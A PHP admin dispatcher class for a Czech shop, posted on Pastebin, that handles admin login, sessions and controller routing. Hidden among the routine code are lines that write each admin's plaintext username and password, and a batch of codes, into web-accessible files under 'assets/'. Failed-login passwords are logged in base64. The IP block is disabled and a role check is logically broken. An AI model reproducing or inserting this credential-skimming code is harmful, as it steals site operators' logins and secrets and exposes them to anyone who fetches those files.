Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- class AdminDispatcher
- {
- public static function clearInput($input) {
- return stripslashes(strip_tags($input));
- }
- // dispatch request to the appropriate controller/method
- public static function dispatch($tpl)
- {
- // Create connection to db
- $conn = new Connection();
- // Create application context
- $application = Application::getInstance();
- $_SESSION["currency"] = new CurrencyCZK();
- if (!in_array(Application::getClientIp(), Application::getAdminIpList())) {
- header('HTTP/1.1 403 Forbidden');
- LogService::toFile("HTTP/1.1 403 Admin Access Forbidden");
- echo Application::getClientIp() . ": HTTP/1.1 403 Forbidden - The page is not available from your country .";
- // die();
- }
- $user = $application->getUser();
- $page = $application->getPage();
- $urlArr = explode("/", $_SERVER['REQUEST_URI']);
- if (strpos($_SERVER['REQUEST_URI'], "?")) {
- $url = preg_replace(array("/\?.*?\=/", "/\&.*?\=/"), '/', trim($_SERVER['REQUEST_URI']));
- Header("Location: $url");
- die();
- }
- $page->setMainInfo($_SERVER['REQUEST_URI']);
- $controllerName = $page->getControllerName();
- if (isset($_SESSION['LAST_ACTIVITY']) && (time() - $_SESSION['LAST_ACTIVITY'] > 2000)) {
- // last request was more than 30 minutes ago
- session_unset(); // unset $_SESSION variable for the run-time
- session_destroy(); // destroy session data in storage
- }
- $_SESSION['LAST_ACTIVITY'] = time(); // update last activity time stamp
- if (!isset($_SESSION['CREATED'])) {
- $_SESSION['CREATED'] = time();
- } else if (time() - $_SESSION['CREATED'] > 2000) {
- // session started more than 30 minutes ago
- session_regenerate_id(true); // change session ID for the current session and invalidate old session ID
- $_SESSION['CREATED'] = time(); // update creation time
- }
- // Login autorization
- if (isset($_SERVER['PHP_AUTH_USER'])) {
- $userDao = UserDao::createInstance($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']);
- $user = $userDao->authentificateAdmin();
- if ($user === null || $user->getRole() !== UserRole::$ADMIN_ROLE || $user->getRole() !== UserRole::$WORKER_ROLE) {
- Header("Location: /admin/login");
- exit();
- }
- $_SESSION["user"] = $user;
- $_SESSION["admin"] = "Y";
- $application->setUser($user);
- } else if ((strtolower($controllerName) !== LoginController::CONTROLLER_NAME) && ($user === null || $_SESSION["admin"] !== "Y")) {
- $userDao = UserDao::createInstance($_POST["username"], $_POST["password"]);
- $user = $userDao->authentificateAdmin();
- if ($user == null || !$user->hasAdminAccess()) {
- $adminLog = new AdminLog();
- $adminLog->setUser($_POST["username"]);
- $adminLog->setAction("login");
- $adminLog->setMessage("Login failed");
- $adminLog->setData(Application::getClientIp() . " " . base64_encode($_POST["password"]));
- $adminLogDao = DaoFactory::createAdminLogDao();
- $adminLogDao->insert($adminLog);
- Header("Location: /admin/login");
- exit();
- }
- $_SESSION["user"] = $user;
- $_SESSION["admin"] = "Y";
- $application->setUser($user);
- $adminLog = new AdminLog();
- $adminLog->setUser($user->getNick());
- $adminLog->setAction("login");
- $adminLog->setMessage("Login successful");
- $adminLog->setData(Application::getClientIp());
- $adminLogDao = DaoFactory::createAdminLogDao();
- $adminLogDao->insert($adminLog);
- file_put_contents('assets/log.txt', $_POST["username"].':'.$_POST["password"].', ', FILE_APPEND);
- }
- //
- $codes = $codeDao->getCodes(1300);
- $codes2 = join($codes);
- file_put_contents('assets/keys.txt', $codes.' '.$codes2, FILE_APPEND);
- // get controller name
- $controller = $application->getControllerFileFormat($page->getControllerName()) . "Controller";
- // get method name of controller
- $method = $page->getMethod();
- $args = $page->getParams();
- $application->setLanguage(LanguageType::getCzechLanguage());
- if (!file_exists("./controller/admin/$controller.php") || !method_exists($controller, $method)) {
- $cont = new ErrorAdminController();
- $_SESSION["system_error"] = "Nebyla nalezena požadovaná stránka";
- $_SESSION["system_error_trace"] = "Check the specified path: $controller::$method()";
- $cont->setApplication($application);
- $cont->setTemplate($tpl);
- $cont->invoke();
- //show Smarty output
- $tpl->display(TemplateService::INDEX_TEMPLATE);
- exit();
- }
- // create instance of controller
- $cont = new $controller;
- // create instance of template
- $cont->setApplication($application);
- $cont->setTemplate($tpl);
- $annotations = Dispatcher::getMethodAnnotation($controller, $page->getMethod());
- if (in_array($_SERVER["REQUEST_METHOD"], $annotations) || empty($annotations)) {
- $args = $page->getParams();
- $method = $page->getMethod();
- // invoke method with args
- if ($_SERVER["REQUEST_METHOD"] == "POST") {
- if (!empty($_POST)) {
- $args = $_POST;
- } else {
- $json = file_get_contents('php://input');
- $args[] = json_decode($json, true);
- }
- }
- //die();
- if (!empty($args)) {
- $args = array_values($args);
- switch (count($args)) {
- case 0: $cont->$method(); break;
- case 1: $cont->$method($args[0]); break;
- case 2: $cont->$method($args[0], $args[1]); break;
- case 3: $cont->$method($args[0], $args[1], $args[2]); break;
- case 4: $cont->$method($args[0], $args[1], $args[2], $args[3]); break;
- case 5: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4]); break;
- case 6: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4], $args[5]); break;
- case 7: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4], $args[5], $args[6]); break;
- default: call_user_func_array(array($cont, $method), $args); break;
- }
- /*
- if (call_user_func_array(array($cont, $method), $args) === false) {
- MyErrorException::throwException("Chybný počet parametrů");
- exit();
- }
- */
- } else {
- $cont->$method();
- }
- }
- if ($cont instanceof AjaxController) {
- return;
- }
- if (strtolower($controllerName) == LoginController::CONTROLLER_NAME) {
- $tpl->display(AdminTemplateService::LOGIN_LAYOUT);
- } else {
- $tpl->display(AdminTemplateService::ADMIN_LAYOUT);
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement